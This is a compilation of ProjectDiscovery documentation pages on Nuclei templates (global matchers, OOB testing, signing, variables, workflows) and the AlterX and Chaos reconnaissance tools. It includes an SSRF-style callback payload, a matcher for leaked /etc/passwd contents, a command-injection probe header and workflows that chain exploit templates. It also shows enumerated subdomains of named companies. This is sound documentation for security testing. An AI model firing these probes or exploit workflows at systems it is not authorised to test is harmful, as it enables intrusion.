In this example, we're using a template that has `global-matchers` set to **true**. It looks for specific patterns, like an asymmetric private key or a Slack webhook, across all HTTP requests. Now, when you run this template along with others, the global matcher will automatically check for those patterns in all HTTP responses. You don't have to set up individual matchers in every single template for it to work.
To run it, use a command like this:
```console
> nuclei -egm -u http://example.com -t http-template-with-global-matchers.yaml -t http-template-1.yaml -t http-template-2.yaml -silent
[http-template-with-global-matchers:asymmetric_private_key] http://example.com/request-from-http-template-1
[http-template-with-global-matchers:slack_webhook] http://example.com/request-from-http-template-2
```
Global matchers are NOT applied by default. You need to explicitly enable them using the `-enable-global-matchers`/`-egm` flag or programmatically via [`nuclei.EnableGlobalMatchersTemplates`](https://pkg.go.dev/github.com/projectdiscovery/nuclei/v3/lib#EnableGlobalMatchersTemplates) if you're working with the Nuclei SDK.
In this case, the global matchers are looking for an asymmetric private key and a Slack webhook. As you can see in the output, it found a match in requests from the other templates, even though the matching logic was only defined once in the global matchers template. This makes it really efficient for detecting patterns across multiple requests without duplicating code in every single template.
# OOB Testing
Source: https://docs.projectdiscovery.io/templates/reference/oob-testing
Understanding OOB testing with Nuclei Templates
Since release of [Nuclei v2.3.6](https://github.com/projectdiscovery/nuclei/releases/tag/v2.3.6), Nuclei supports using the [interactsh](https://github.com/projectdiscovery/interactsh) API to achieve OOB based vulnerability scanning with automatic Request correlation built in. It's as easy as writing `{{interactsh-url}}` anywhere in the request, and adding a matcher for `interact_protocol`. Nuclei will handle correlation of the interaction to the template & the request it was generated from allowing effortless OOB scanning.
## Interactsh Placeholder
`{{interactsh-url}}` placeholder is supported in **http** and **network** requests.
An example of nuclei request with `{{interactsh-url}}` placeholders is provided below. These are replaced on runtime with unique interactsh URLs.
```yaml
- raw:
- |
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
```
## Interactsh Matchers
Interactsh interactions can be used with `word`, `regex` or `dsl` matcher/extractor using following parts.
| part |
| -------------------- |
| interactsh\_protocol |
| interactsh\_request |
| interactsh\_response |
**interactsh\_protocol**
Value can be dns, http or smtp. This is the standard matcher for every interactsh based template with DNS often as the common value as it is very non-intrusive in nature.
**interactsh\_request**
The request that the interactsh server received.
**interactsh\_response**
The response that the interactsh server sent to the client.
Example of Interactsh DNS Interaction matcher:
```yaml
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
```
Example of HTTP Interaction matcher + word matcher on Interaction content
```yaml
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: regex
part: interactsh_request # Confirms the retrieval of /etc/passwd file
regex:
- 'root:.*:0:0:'
```
# Preprocessors
Source: https://docs.projectdiscovery.io/templates/reference/preprocessors
Review details on pre-processors for Nuclei
Certain pre-processors can be specified globally anywhere in the template that run as soon as the template is loaded to achieve things like random ids generated for each template run.
### randstr
Generates a [random ID](https://github.com/rs/xid) for a template on each nuclei run. This can be used anywhere in the template and will always contain the same value. `randstr` can be suffixed by a number, and new random ids will be created for those names too. Ex. `{{randstr_1}}` which will remain same across the template.
`randstr` is also supported within matchers and can be used to match the inputs.
For example:-
```yaml
http:
- method: POST
path:
- "{{BaseURL}}/level1/application/"
headers:
cmd: echo '{{randstr}}'
matchers:
- type: word
words:
- '{{randstr}}'
```
# Template Signing
Source: https://docs.projectdiscovery.io/templates/reference/template-signing
Review details on template signing for Nuclei
Template signing via the private-public key mechanism is a crucial aspect of ensuring the integrity, authenticity, and security of templates. This mechanism involves the use of asymmetric cryptography, specifically the Elliptic Curve Digital Signature Algorithm (ECDSA), to create a secure and verifiable signature.
In this process, a template author generates a private key that remains confidential and securely stored. The corresponding public key is then shared with the template consumers. When a template is created or modified, the author signs it using their private key, generating a unique signature that is attached to the template.
Template consumers can verify the authenticity and integrity of a signed template by using the author's public key. By applying the appropriate cryptographic algorithm (ECDSA), they can validate the signature and ensure that the template has not been tampered with since it was signed. This provides a level of trust, as any modifications or unauthorized changes to the template would result in a failed verification process.
By employing the private-public key mechanism, template signing adds an additional layer of security and trust to the template ecosystem. It helps establish the identity of the template author and ensures that the templates used in various systems are genuine and have not been altered maliciously.
**What does signing a template mean?**
Template signing is a mechanism to ensure the integrity and authenticity of templates. The primary goal is to provide template writers and consumers a way to trust crowdsourced or custom templates ensuring that they are not tampered with.
All [official Nuclei templates](https://github.com/projectdiscovery/nuclei-templates) include a digital signature and are verified by Nuclei while loading templates using ProjectDiscovery's public key (shipped with the Nuclei binary).
Individuals or organizations running Nuclei in their work environment can generate their own key-pair with `nuclei` and sign their custom templates with their private key, thus ensuring that only authorized templates are being used in their environment.
This also allows entities to fully utilize the power of new protocols like `code` without worrying about malicious custom templates being used in their environment.
**NOTE:**
* **Template signing is optional for all protocols except `code`**.
* **Unsigned code templates are disabled and can not be executed using Nuclei**.
* **Only signed code templates by the author (yourself) or ProjectDiscovery can be executed.**
* **Template signing is primarily introduced to ensure security of template to run code on host machine.**
* Code file references (for example: `source: protocols/code/pyfile.py`) are allowed and content of these files is included in the template digest.
* Payload file references (for example: `payloads: protocols/http/params.txt`) are not included in the template digest as it is treated as a payload/helper and not actual code that is being executed.
* Template signing is deterministic while both signing and verifying a template i.e. if a code file is referenced in a template that is present outside of templates directory with `-lfa` flag then verification will fail if same template is used without `-lfa` flag. (Note this only applies to `-lfa` i.e. local file access flag only)
### Signing Custom Template
The simplest and recommended way to generate key-pair and signing/verfifying templates is to use `nuclei` itself.
When signing a template if key-pair does not exist then Nuclei will prompt user to generate a new key-pair with options.
```console
$ ./nuclei -t templates.yaml -sign
[INF] Generating new key-pair for signing templates
[*] Enter User/Organization Name (exit to abort) : acme
[*] Enter passphrase (exit to abort):
[*] Enter same passphrase again:
[INF] Successfully generated new key-pair for signing templates
```
> **Note:** Passphrase is optional and can be left blank when used private key is encrypted with passphrase using PEMCipherAES256 Algo
Once a key-pair is generated, you can sign any custom template using `-sign` flag as shown below.
```console
$ ./nuclei -t templates.yaml -sign
[INF] All templates signatures were elaborated success=1 failed=0
```
> **Note:** Every time you make any change in your code template, you need to re-sign it to run with Nuclei.
### Template Digest and Signing Keys
When a template is signed, a digest is generated and added to the template. This digest is a hash of the template content and is used to verify the integrity of the template. If the template is modified after signing, the digest will change, and the signature verification will fail during template loading.
```yaml
# digest: 4a0a00473045022100eb01da6b97893e7868c584f330a0cd52df9bddac005860bb8595ba5b8aed58c9022050043feac68d69045cf320cba9298a2eb2e792ea4720d045d01e803de1943e7d:4a3eb6b4988d95847d4203be25ed1d46
```
The digest is in the format of `signature:fragment`, where the signature is the digital signature of the template used to verify its integrity, and the fragment is metadata generated by MD5 hashing the public key to disable re-signing of code templates not written by you.
The key-pair generated by Nuclei is stored in two files in the `$CONFIG/nuclei/keys directory`, where `$CONFIG` is the system-specific config directory. The private key is stored in nuclei-user-private-key.pem, which is encrypted with a passphrase if provided. The public key is stored in nuclei-user.crt, which includes the public key and identifier (e.g., user/org name) in a self-signed certificate.
```bash
$ la ~/.config/nuclei/keys
total 16
-rw------- 1 tarun staff 251B Oct 4 21:45 nuclei-user-private-key.pem # encrypted private key with passphrase
-rw------- 1 tarun staff 572B Oct 4 21:45 nuclei-user.crt # self signed certificate which includes public key and identifier (i.e user/org name)
```
To use the public key for verification, you can either copy it to the `$CONFIG/nuclei/keys` directory on another user's machine, or set the `NUCLEI_USER_CERTIFICATE` environment variable to the path or content of the public key.
To use the private key, you can copy it to the `$CONFIG/nuclei/keys` directory on another user's machine, or set the `NUCLEI_USER_PRIVATE_KEY` environment variable to the path or content of the private key.
```console
$ export NUCLEI_USER_CERTIFICATE=$(cat path/to/nuclei-user.crt)
$ export NUCLEI_USER_PRIVATE_KEY=$(cat path/to/nuclei-user-private-key.pem)
```
It's important to note that you are responsible for securing and managing the private key, and Nuclei has no accountability for any loss of the private key.
By default, Nuclei loads the user certificate (public key) from the default locations mentioned above and uses it to verify templates. When running Nuclei, it will execute signed templates and warn about executing unsigned custom templates and block unsigned code templates. You can disable this warning by setting the `HIDE_TEMPLATE_SIG_WARNING` environment variable to `true`.
## FAQ
**Found X unsigned or tampered code template?**
```bash
./nuclei -u scanme.sh -t simple-code.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.0-dev
projectdiscovery.io
[WRN] Found 1 unsigned or tampered code template (carefully examine before using it & use -sign flag to sign them)
[INF] Current nuclei version: v3.0.0-dev (development)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] No results found. Better luck next time!
[FTL] Could not run nuclei: no templates provided for scan
```
Here `simple-code.yaml` is a code protocol template which is not signed or content of template has been modified after signing which indicates loss of integrity of template.
If you are template writer then you can go ahead and sign the template using `-sign` flag and if you are template consumer then you should carefully examine the template before signing it.
**Re-signing code templates are not allowed for security reasons?**
```bash
nuclei -u scanme.sh -t simple-code.yaml -sign
[ERR] could not sign 'simple-code.yaml': [signer:RUNTIME] re-signing code templates are not allowed for security reasons.
[INF] All templates signatures were elaborated success=0 failed=1
```
The error message `re-signing code templates are not allowed for security reasons` comes from the Nuclei engine. This error indicates that a code template initially signed by another user and someone is trying to re-sign it.
This measure was implemented to prevent running untrusted templates unknowingly, which might lead to potential security issues.
When you encounter this error, it suggests that you're dealing with a template that has been signed by another user Likely, the original signer is not you or the team from projectdiscovery.
By default, Nuclei disallows executing code templates that are signed by anyone other than you or from the public templates provided by projectdiscovery/nuclei-templates.
This is done to prevent potential security abuse using code templates.
To resolve this error:
1. Open and thoroughly examine the code template for any modifications.
2. Manually remove the existing digest signature from the template.
3. Sign the template again.
This way, you can ensure that only templates verified and trusted by you (or projectdiscovery) are run, thus maintaining a secure environment.
# Variables
Source: https://docs.projectdiscovery.io/templates/reference/variables
Review details on variables for Nuclei
Variables can be used to declare some values which remain constant throughout the template. The value of the variable once calculated does not change. Variables can be either simple strings or DSL helper functions. If the variable is a helper function, it is enclosed in double-curly brackets `{{}}`. Variables are declared at template level.
Example variables -
```yaml
variables:
a1: "test" # A string variable
a2: "{{to_lower(rand_base(5))}}" # A DSL function variable
```
Currently, `dns`, `http`, `headless` and `network` protocols support variables.
Example of templates with variables -
```yaml
# Variable example using HTTP requests
id: variables-example
info:
name: Variables Example
author: pdteam
severity: info
variables:
a1: "value"
a2: "{{base64('hello')}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{FQDN}}
Test: {{a1}}
Another: {{a2}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "value"
- "aGVsbG8="
```
```yaml
# Variable example for network requests
id: variables-example
info:
name: Variables Example
author: pdteam
severity: info
variables:
a1: "PING"
a2: "{{base64('hello')}}"
tcp:
- host:
- "{{Hostname}}"
inputs:
- data: "{{a1}}"
read-size: 8
matchers:
- type: word
part: data
words:
- "{{a2}}"
```
# Nuclei Template Structure
Source: https://docs.projectdiscovery.io/templates/structure
Learn the common elements required to create a Nuclei Template
# Template Structure
Nuclei Templates use a custom YAML-based DSL, with their structure varying according to the specific protocol employed. Typically, a template comprises the following elements:
* A [unique ID](#id) for the template
* Essential [information](#information) and [metadata](#metadata) relevant to the template
* The designated protocol, such as [HTTP](/templates/protocols/http/basic-http), [DNS](/templates/protocols/dns), [File](/templates/protocols/file), etc.
* Details specific to the chosen protocol, like the requests made in the HTTP protocol
* A series of [matchers](/templates/reference/matchers) to ascertain the presence of findings
* Necessary [extractors](/templates/reference/extractors) for data retrieval from the results
For a detailed, automatically generated overview of everything available in the nuclei template syntax, you can visit the [syntax reference](https://github.com/projectdiscovery/nuclei/blob/dev/SYNTAX-REFERENCE.md) on GitHub
## ID
Each template has a unique ID which is used during output writing to specify the template name for an output line.
The template file ends with **YAML** extension. The template files can be created any text editor of your choice.
```yaml
id: git-config
```
ID must not contain spaces. This is done to allow easier output parsing.
## Information
Next important piece of information about a template is the **info** block. Info block provides **name**, **author**, **severity**, **description**, **reference**, **tags** and `metadata`. It also contains **severity** field which indicates the severity of the template, **info** block also supports dynamic fields, so one can define N number of `key: value` blocks to provide more useful information about the template. **reference** is another popular tag to define external reference links for the template.
Another useful tag to always add in `info` block is **tags**. This allows you to set some custom tags to a template, depending on the purpose like `cve`, `rce` etc. This allows nuclei to identify templates with your input tags and only run them.
Example of an info block -
```yaml
info:
name: Git Config File Detection Template
author: Ice3man
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
reference: https://www.acunetix.com/vulnerabilities/web/git-repository-found/
tags: git,config
```
Actual requests and corresponding matchers are placed below the info block, and they perform the task of making requests to target servers and finding if the template request was successful.
Each template file can contain multiple requests to be made. The template is iterated and one by one the desired requests are made to the target sites.
The best part of this is you can simply share your crafted template with your teammates, triage/security team to replicate the issue on the other side with ease.
## Metadata
It's possible to add metadata nodes, for example, to integrates with [uncover](https://github.com/projectdiscovery/uncover) (cf. [Uncover Integration](https://docs.projectdiscovery.io/tools/nuclei/running#scan-on-internet-database)).
The metadata nodes are crafted this way: `-query: ''` where:
* `` is the search engine, equivalent of the value of the `-ue` option of nuclei or the `-e` option of uncover
* `` is the search query, equivalent of the value of the `-uq` option of nuclei or the `-q` option of uncover
For example for Shodan:
```
info:
metadata:
shodan-query: 'vuln:CVE-2021-26855'
```
# Workflow Examples
Source: https://docs.projectdiscovery.io/templates/workflows/examples
Review some template workflow examples for Nuclei
## Generic workflows
A generic workflow that runs two templates, one to detect Jira and another to detect Confluence.
```yaml
id: workflow-example
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/jira-detect.yaml
- template: technologies/confluence-detect.yaml
```
## Basic conditional workflows
A condition based workflow, which first tries to detect if springboot is running on a target. If springboot is found, a list of exploits executed against it.
```yaml
id: springboot-workflow
info:
name: Springboot Security Checks
author: dwisiswant0
workflows:
- template: security-misconfiguration/springboot-detect.yaml
subtemplates:
- template: cves/CVE-2018-1271.yaml
- template: cves/CVE-2018-1271.yaml
- template: cves/CVE-2020-5410.yaml
- template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot-h2-db-rce.yaml
```
## Multi condition workflows
This template demonstrates nested workflows with nuclei, where there's multiple levels of chaining of templates.
```yaml
id: springboot-workflow
info:
name: Springboot Security Checks
author: dwisiswant0
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: lotus-domino
subtemplates:
- template: technologies/lotus-domino-version.yaml
subtemplates:
- template: cves/xx-yy-zz.yaml
subtemplates:
- template: cves/xx-xx-xx.yaml
```
## Conditional workflows with matcher
This template detects if WordPress is running on an input host, and if found a set of targeted exploits and CVEs are executed against it.
```yaml
id: workflow-example
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: wordpress
subtemplates:
- template: cves/CVE-2019-6715.yaml
- template: cves/CVE-2019-9978.yaml
- template: files/wordpress-db-backup.yaml
- template: files/wordpress-debug-log.yaml
- template: files/wordpress-directory-listing.yaml
- template: files/wordpress-emergency-script.yaml
- template: files/wordpress-installer-log.yaml
- template: files/wordpress-tmm-db-migrate.yaml
- template: files/wordpress-user-enumeration.yaml
- template: security-misconfiguration/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/sassy-social-share.yaml
- template: vulnerabilities/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress-duplicator-path-traversal.yaml
- template: vulnerabilities/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml
```
## Multiple Matcher workflow
Very similar to the last example, with multiple matcher names.
```yaml
id: workflow-multiple-matcher
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:
- tags: vbulletin
- name: jboss
subtemplates:
- tags: jboss
```
# Template Workflows Overview
Source: https://docs.projectdiscovery.io/templates/workflows/overview
Learn about template workflows in Nuclei
Workflows enable users to orchestrate a series of actions by setting a defined execution order for various templates. These templates are activated upon predetermined conditions, establishing a streamlined method to leverage the capabilities of nuclei tailored to the user's specific requirements. Consequently, you can craft workflows that are contingent on particular technologies or targets—such as those exclusive to WordPress or Jira—triggering these sequences only when the relevant technology is identified.
Within a workflow, all templates share a unified execution environment, which means that any named extractor from one template can be seamlessly accessed in another by simply referencing its designated name.
For those with prior knowledge of the technology stack in use, we advise constructing personalized workflows for your scans. This strategic approach not only substantially reduces the duration of scans but also enhances the quality and precision of the outcomes.
Workflows can be defined with `workflows` attribute, following the `template` / `subtemplates` and `tags` to execute.
```yaml
workflows:
- template: http/technologies/template-to-execute.yaml
```
**Type of workflows**
1. [Generic workflows](#generic-workflows)
2. [Conditional workflows](#conditional-workflows)
## Generic Workflows
In generic workflow one can define single or multiple template to be executed from a single workflow file. It supports both files and directories as input.
A workflow that runs all config related templates on the list of give URLs.
```yaml
workflows:
- template: http/exposures/configs/git-config.yaml
- template: http/exposures/configs/exposed-svn.yaml
- template: http/vulnerabilities/generic/generic-env.yaml
- template: http/exposures/backups/zip-backup-files.yaml
- tags: xss,ssrf,cve,lfi
```
A workflow that runs specific list of checks defined for your project.
```yaml
workflows:
- template: http/cves/
- template: http/exposures/
- tags: exposures
```
## Conditional Workflows
You can also create conditional templates which execute after matching the condition from a previous template. This is mostly useful for vulnerability detection and exploitation as well as tech based detection and exploitation. Use-cases for this kind of workflows are vast and varied.
**Templates based condition check**
A workflow that executes subtemplates when base template gets matched.
```yaml
workflows:
- template: http/technologies/jira-detect.yaml
subtemplates:
- tags: jira
- template: exploits/jira/
```
**Matcher Name based condition check**
A workflow that executes subtemplates when a matcher of base template is found in result.
```yaml
workflows:
- template: http/technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:
- template: exploits/vbulletin-exp1.yaml
- template: exploits/vbulletin-exp2.yaml
- name: jboss
subtemplates:
- template: exploits/jboss-exp1.yaml
- template: exploits/jboss-exp2.yaml
```
In similar manner, one can create as many and as nested checks for workflows as needed.
**Subtemplate and matcher name based multi level conditional check**
A workflow showcasing chain of template executions that run only if the previous templates get matched.
```yaml
workflows:
- template: http/technologies/tech-detect.yaml
matchers:
- name: lotus-domino
subtemplates:
- template: http/technologies/lotus-domino-version.yaml
subtemplates:
- template: http/cves/2020/xx-yy-zz.yaml
subtemplates:
- template: http/cves/2020/xx-xx-xx.yaml
```
Conditional workflows are great examples of performing checks and vulnerability detection in most efficient manner instead of spraying all the templates on all the targets and generally come with good ROI on your time and is gentle for the targets as well.
## Shared Execution Context
Nuclei engine supports transparent workflow cookiejar and key-value sharing across templates parts of a same workflow. Here follow an example of a workflow that extract a value from the first template and use it in the second conditional one:
```yaml
id: key-value-sharing-example
info:
name: Key Value Sharing Example
author: pdteam
severity: info
workflows:
- template: template-with-named-extractor.yaml
subtemplates:
- template: template-using-named-extractor.yaml
```
For example, the following templates extract `href` links from a target web page body and make the value available under the `extracted` key:
```yaml
# template-with-named-extractor.yaml
id: value-sharing-template1
info:
name: value-sharing-template1
author: pdteam
severity: info
http:
- path:
- "{{BaseURL}}/path1"
extractors:
- type: regex
part: body
name: extracted
regex:
- 'href="(.*)"'
group: 1
```
Finally the second template in the workflow will use the obtained value by referencing the extractor name (`extracted`):
```yaml
# template-using-named-extractor.yaml
id: value-sharing-template2
info:
name: value-sharing-template2
author: pdteam
severity: info
http:
- raw:
- |
GET /path2 HTTP/1.1
Host: {{Hostname}}
{{extracted}}
```
# AlterX Install
Source: https://docs.projectdiscovery.io/tools/alterx/install
Learn how to install AlterX and get started
Enter the command below in a terminal to install uncover using Go.
```bash
go install github.com/projectdiscovery/alterx/cmd/alterx@latest
```
## Installation Notes
* AlterX requires the latest version of [**Go**](https://go.dev/doc/install)
# AlterX Overview
Source: https://docs.projectdiscovery.io/tools/alterx/overview
A fast and customizable subdomain wordlist generator
**AlterX** is a high-performance, customizable subdomain wordlist generator. It fits into common subdomain enumeration pipelines by using customizable patterns, not hardcoded ones.
For more details, check out [our blog introducing AlterX](https://blog.projectdiscovery.io/introducing-alterx-simplifying-active-subdomain-enumeration-with-patterns/) or view the [GitHub repo](https://github.com/projectdiscovery/alterx).
## Features
* **Fast and Customizable**: Generate subdomain wordlists tailored to your needs.
* **Automatic Word Enrichment**: Built-in enrichment to expand results.
* **Pre-defined Variables**: Use variables to simplify your patterns.
* **Configurable Patterns**: Modify patterns to match specific enumeration pipelines.
* **STDIN / List Input**: Accepts standard input and list files for easy integration.
## Support
Need help with **AlterX**? Whether it’s installation issues or feedback on a cool use case, we want to hear from you.
* Visit the [Help](/help) section for docs.
## Join the Community
If you have questions or want to discuss ProjectDiscovery with other developers, join us on [Discord](https://discord.com/invite/projectdiscovery).
Welcome to the ProjectDiscovery Discord Server!
Get support, share stories, and engage with the community.
# Running AlterX
Source: https://docs.projectdiscovery.io/tools/alterx/running
Learn about running AlterX with details on variables and examples
## Basic Usage
For a detailed overview of **AlterX** options, visit the [Usage](/tools/alterx/usage) page.
If you have questions, feel free to reach out through our [Help](/help) page.
## Why AlterX?
What differentiates `alterx` from other subdomain permutation tools like `goaltdns` is its **scripting** feature. AlterX accepts patterns as input and generates subdomain permutation wordlists based on these patterns—similar to how [Nuclei](https://github.com/projectdiscovery/nuclei) works with [fuzzing-templates](https://github.com/projectdiscovery/fuzzing-templates).
Active Subdomain Enumeration is challenging due to the probability of finding actual existing domains. On a scale, this process can be visualized as:
```console
Using Wordlist < generate permutations with subdomains (goaltdns) < alterx
```
Most subdomain permutation tools rely on hardcoded patterns, generating massive wordlists that may contain millions of subdomains—making bruteforcing with tools like `dnsx` infeasible. With `alterx`, you can create patterns based on results from passive subdomain enumeration, significantly increasing the chances of finding valid subdomains and making brute-forcing more efficient.
## Variables
`alterx` uses variable-like syntax similar to nuclei-templates. You can create custom patterns using these variables . when domains are passed as input `alterx` evaluates input and extracts variables from it .
### Basic Variables
```yaml
{{sub}} : subdomain prefix or left most part of a subdomain
{{suffix}} : everything except {{sub}} in subdomain name is suffix
{{tld}} : top level domain name (ex com,uk,in etc)
{{etld}} : also know as public suffix (ex co.uk , gov.in etc)
```
| Variable | api.scanme.sh | admin.dev.scanme.sh | cloud.scanme.co.uk |
| ------------ | ------------- | ------------------- | ------------------ |
| `{{sub}}` | `api` | `admin` | `cloud` |
| `{{suffix}}` | `scanme.sh` | `dev.scanme.sh` | `scanme.co.uk` |
| `{{tld}}` | `sh` | `sh` | `uk` |
| `{{etld}}` | `-` | `-` | `co.uk` |
### Advanced Variables
```yaml
{{root}} : also known as eTLD+1 i.e only root domain (ex for api.scanme.sh => {{root}} is scanme.sh)
{{subN}} : here N is an integer (ex {{sub1}} , {{sub2}} etc) .
// {{subN}} is advanced variable which exists depending on input
// lets say there is a multi level domain cloud.nuclei.scanme.sh
// in this case {{sub}} = cloud and {{sub1}} = nuclei`
```
| Variable | api.scanme.sh | admin.dev.scanme.sh | cloud.scanme.co.uk |
| ---------- | ------------- | ------------------- | ------------------ |
| `{{root}}` | `scanme.sh` | `scanme.sh` | `scanme.co.uk` |
| `{{sub1}}` | `-` | `dev` | `-` |
| `{{sub2}}` | `-` | `-` | `-` |
## Patterns
In simple terms, a pattern is a `template` that describes what type of permutations AlterX should generate.
```console
// Below are some of example patterns which can be used to generate permutations
// assuming api.scanme.sh was given as input and variable {{word}} was given as input with only one value prod
// alterx generates subdomains for below patterns
"{{sub}}-{{word}}.{{suffix}}" // ex: api-prod.scanme.sh
"{{word}}-{{sub}}.{{suffix}}" // ex: prod-api.scanme.sh
"{{word}}.{{sub}}.{{suffix}}" // ex: prod.api.scanme.sh
"{{sub}}.{{word}}.{{suffix}}" // ex: api.prod.scanme.sh
```
You can find an example of a pattern configuration file [here](https://github.com/projectdiscovery/alterx/blob/main/permutations.yaml). This file is customizable based on your security assessments or penetration test requirements.
This configuration file generates subdomain permutations for security assessments or penetration tests using customizable patterns and dynamic payloads. Patterns include dash-based, dot-based, and others. Users can create custom payload sections, such as words, region identifiers, or numbers, to suit their specific needs.
For example, a user could define a new payload section `env` with values like `prod` and `dev`, then use it in patterns like `{{env}}-{{word}}.{{suffix}}` to generate subdomains like `prod-app.example.com` and `dev-api.example.com`. This flexibility allows tailored subdomain list for unique testing scenarios and target environments.
Default pattern config file used for generation is stored in `$HOME/.config/alterx/` directory, and custom config file can be also used using `-ac` option.
## Examples
An example of running alterx on existing list of passive subdomains of `tesla.com` yield us **10 additional NEW** and **valid subdomains** resolved using [dnsx](https://github.com/projectdiscovery/dnsx).
```console
$ chaos -d tesla.com | alterx | dnsx
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 8312 permutations in 0.0740s
auth-global-stage.tesla.com
auth-stage.tesla.com
digitalassets-stage.tesla.com
errlog-stage.tesla.com
kronos-dev.tesla.com
mfa-stage.tesla.com
paymentrecon-stage.tesla.com
sso-dev.tesla.com
shop-stage.tesla.com
www-uat-dev.tesla.com
```
Similarly `-enrich` option can be used to populate known subdomains as world input to generate **target aware permutations**.
```console
$ chaos -d tesla.com | alterx -enrich
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 662010 permutations in 3.9989s
```
You can alter the default patterns at run time using `-pattern` CLI option.
```console
$ chaos -d tesla.com | alterx -enrich -p '{{word}}-{{suffix}}'
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 21523 permutations in 0.7984s
```
You can also overwrite existing variable values using the `-payload` CLI options.
```console
$ alterx -list tesla.txt -enrich -p '{{word}}-{{year}}.{{suffix}}' -pp word=keywords.txt -pp year=2023
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 21419 permutations in 1.1699s
```
For more information, check out the release **[blog](https://blog.projectdiscovery.io/introducing-alterx-simplifying-active-subdomain-enumeration-with-patterns/)**
Explore other subdomain permutation tools that might integrate well with your workflow:
* [altdns](https://github.com/infosec-au/altdns)
* [goaltdns](https://github.com/subfinder/goaltdns)
* [gotator](https://github.com/Josue87/gotator)
* [ripgen](https://github.com/resyncgg/ripgen/)
* [dnsgen](https://github.com/ProjectAnte/dnsgen)
* [dmut](https://github.com/bp0lr/dmut)
* [permdns](https://github.com/hpy/permDNS)
* [str-replace](https://github.com/j3ssie/str-replace)
* [dnscewl](https://github.com/codingo/DNSCewl)
* [regulator](https://github.com/cramppet/regulator)
# AlterX Usage
Source: https://docs.projectdiscovery.io/tools/alterx/usage
Learn AlterX usage including flags and filters
## Access help
Use `alterx -h` to display all of the help options.
## AlterX options
You can use the following command to see the available flags and options:
```console
Fast and customizable subdomain wordlist generator using DSL.
Usage:
./alterx [flags]
Flags:
INPUT:
-l, -list string[] subdomains to use when creating permutations (stdin, comma-separated, file)
-p, -pattern string[] custom permutation patterns input to generate (comma-seperated, file)
-pp, -payload value custom payload pattern input to replace/use in key=value format (-pp 'word=words.txt')
OUTPUT:
-es, -estimate estimate permutation count without generating payloads
-o, -output string output file to write altered subdomain list
-ms, -max-size int Max export data size (kb, mb, gb, tb) (default mb)
-v, -verbose display verbose output
-silent display results only
-version display alterx version
CONFIG:
-config string alterx cli config file (default '$HOME/.config/alterx/config.yaml')
-en, -enrich enrich wordlist by extracting words from input
-ac string alterx permutation config file (default '$HOME/.config/alterx/permutation_v0.0.1.yaml')
-limit int limit the number of results to return (default 0)
UPDATE:
-up, -update update alterx to latest version
-duc, -disable-update-check disable automatic alterx update check
```
# Chaos Install
Source: https://docs.projectdiscovery.io/tools/chaos/install
Learn how to install Chaos and get started
Enter the command below in a terminal to install ProjectDiscovery's Chaos Client using Go.
```bash
go install -v github.com/projectdiscovery/chaos-client/cmd/chaos@latest
```
## Installation Notes
* Chaos requires the latest version of [**Go**](https://go.dev/doc/install)
# Chaos Overview
Source: https://docs.projectdiscovery.io/tools/chaos/overview
A Go Client to communicate with the Chaos API
Chaos is a comprehensive API dataset of DNS entries across the internet. Maintained by ProjectDiscovery, Chaos is actively updated and contains thousand of records.
Check out [our blog introducing Chaos](https://blog.projectdiscovery.io/introducing-chaos-bug-bounty-recon-data-api/), and learn more on the [Chaos website](https://chaos.projectdiscovery.io/)
## Support
Questions about using Chaos? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
Need Assistance?
We're here to help you! Explore the documentation or join the conversation.
# Running Chaos
Source: https://docs.projectdiscovery.io/tools/chaos/running
Learn about running Chaos with details and an example
For all of the flags and options available for **Chaos** be sure to check out the [Usage](/tools/chaos/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
In order to get subdomains for a domain, use the following command.
```bash
chaos -d uber.com -silent
restaurants.uber.com
testcdn.uber.com
approvalservice.uber.com
zoom-logs.uber.com
eastwood.uber.com
meh.uber.com
webview.uber.com
kiosk-api.uber.com
utmbeta-staging.uber.com
getmatched-staging.uber.com
logs.uber.com
dca1.cfe.uber.com
cn-staging.uber.com
frontends-primary.uber.com
eng.uber.com
guest.uber.com
kiosk-home-staging.uber.com
```
## API Key
You can get your API key by either signing up or logging in at [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io?ref=api_key).
## API Key Environment variable
You can also set the API key as an environment variable in your bash profile.
```bash
export CHAOS_KEY=CHAOS_API_KEY
```
## Notes
